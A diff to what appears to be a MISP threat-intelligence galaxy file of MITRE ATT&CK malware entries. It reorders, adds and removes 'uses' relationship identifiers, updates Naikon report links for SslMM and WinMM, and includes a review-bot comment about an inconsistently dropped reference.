@@ -8897,13 +10643,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "8ae43c46-57ef-47d5-a77a-eebb35628db2", @@ -8951,6 +10690,20 @@ ], "type": "uses" }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ @@ -8958,6 +10711,27 @@ ], "type": "uses" }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -8972,27 +10746,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", "tags": [ 
@@ -9000,27 +10753,6 @@ ], "type": "uses" }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -9028,6 +10760,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", "tags": [ @@ -9043,42 +10782,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -9092,7 +10796,42 @@ "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9136,14 +10875,14 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9180,13 +10919,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ 
@@ -9194,34 +10926,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
 "tags": [
@@ -9230,14 +10934,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
+ "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -9250,12 +10954,54 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "e6ef745b-077f-42e1-a37d-29eecff9c754",
@@ -9285,7 +11031,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -9299,7 +11045,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -9355,34 +11101,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
 "tags": [
@@ -9390,27 +11108,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
 "tags": [
@@ -9418,12 +11115,61 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "96b08451-b27a-4ff6-893f-790e26393a8e",
@@ -9467,14 +11213,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -9536,14 +11282,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -9583,6 +11329,13 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
 "tags": [
@@ -9596,13 +11349,6 @@
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
- },
- {
- "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
 }
 ],
 "uuid": "8c553311-0baa-4146-997a-f79acef3d831",
@@ -9617,7 +11363,7 @@
 ],
 "refs": [
 "https://attack.mitre.org/software/S0058",
- "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf"
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf"
 ],
 "synonyms": [
 "SslMM"
@@ -9639,14 +11385,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -9659,6 +11398,13 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
 "tags": [
@@ -9667,7 +11413,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -9680,13 +11433,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433",
 "tags": [
@@ -9706,8 +11452,7 @@
 "Windows"
 ],
 "refs": [
- "https://attack.mitre.org/software/S0059",
- "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf"
+ "https://attack.mitre.org/software/S0059"
 ],
 "synonyms": [
 "WinMM"
@@ -9735,13 +11480,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433",
 "tags": [
@@ -9750,7 +11488,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -9762,6 +11500,13 @@
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "22addc7b-b39f-483d-979a-1b35147da5de",
@@ -9791,7 +11536,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842",
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
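Review bot: The `refs` hunk for S0059 (`@@ -9706,8 +11452,7 @@`) drops the Naikon report reference entirely, while the matching hunk for S0058 on the previous line of this diff replaces the dead `securelist.com` URL with `https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf`. Unless the upstream data intentionally removed the citation from S0059, the new side should keep both entries, `"https://attack.mitre.org/software/S0059",` followed by the updated Kaspersky URL, so the two entries that cite the same report stay consistent and the reference is not silently lost. The `refs` array this hunk edits starts above the hunk, so it cannot be confirmed here whether other references were dropped as well.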
@@ -9805,7 +11550,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -9853,14 +11598,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -9893,13 +11638,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
 "tags": [
@@ -9907,41 +11645,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
 "tags": [
@@ -9949,12 +11652,54 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "166c0eca-02fd-424a-92c0-6b5106994d31",
@@ -9984,14 +11729,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10026,7 +11771,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10040,14 +11785,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91",
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10059,6 +11797,13 @@
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "d69c8146-ab35-4d50-8382-6fc80e641d43",
@@ -10088,14 +11833,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10142,6 +11887,13 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
 "tags": [
@@ -10155,13 +11907,6 @@
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
- },
- {
- "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
 }
 ],
 "uuid": "dfb5fa9b-3051-4b97-8035-08f80aef945b",
@@ -10187,34 +11932,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
 "tags": [
@@ -10230,7 +11947,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10242,6 +11966,27 @@
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "463f68f1-5cde-4dc2-a831-68b73488f8f4",
@@ -10277,6 +12022,13 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7",
 "tags": [
@@ -10291,13 +12043,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
 "tags": [
@@ -10306,7 +12051,21 @@
 "type": "uses"
 },
 {
- "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10325,20 +12084,6 @@
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
- },
- {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
 }
 ],
 "uuid": "26fed817-e7bf-41f9-829a-9075ffac45c2",
@@ -10389,13 +12134,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
- "tags": [
